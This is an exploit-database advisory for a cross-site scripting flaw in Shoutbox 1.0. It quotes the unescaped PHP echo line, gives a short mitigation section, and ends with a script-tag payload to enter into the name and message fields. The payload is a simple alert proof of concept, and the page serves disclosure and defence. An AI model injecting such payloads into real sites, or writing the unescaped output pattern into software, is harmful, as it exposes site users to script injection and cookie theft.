header-logo
Suggest Exploit
vendor:
Shoutbox
by:
SKuLL-HacKeR
9.3
CVSS
HIGH
Cross-site Scripting (XSS)
79
CWE
Product Name: Shoutbox
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:plohni:shoutbox:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Shoutbox 1.0 HTML / Xss inejction exploit

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'names' and 'shouts' parameters to the '/Shoutbox/index.php' script. A remote attacker can execute arbitrary HTML and script code in a browser in the context of the vulnerable site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically generate HTML or JavaScript code. It is also recommended to use a whitelist of allowed characters and to escape all other characters.
Source

Exploit-DB raw data:

# Vulnerable Code in index.php :
#
# <p><strong><?php echo $names[$i]; ?>:</strong> <?php echo $shouts[$i]; ?></p>
#
########################################
# Shoutbox 1.0 HTML / Xss inejction exploit
# AuTh0r  : SKuLL-HacKeR                                                
# H0ME     : Sec-Best & SaudiHack & S3curity-Art                        
# Email    : My@Hotmail.iT                                              
########################################
 
Vendor: http://www.plohni.com
exploit: 
site.com/Shoutbox/index.php
in the select your name and your text put this code 
'">><script>alert('XSS skh')</script>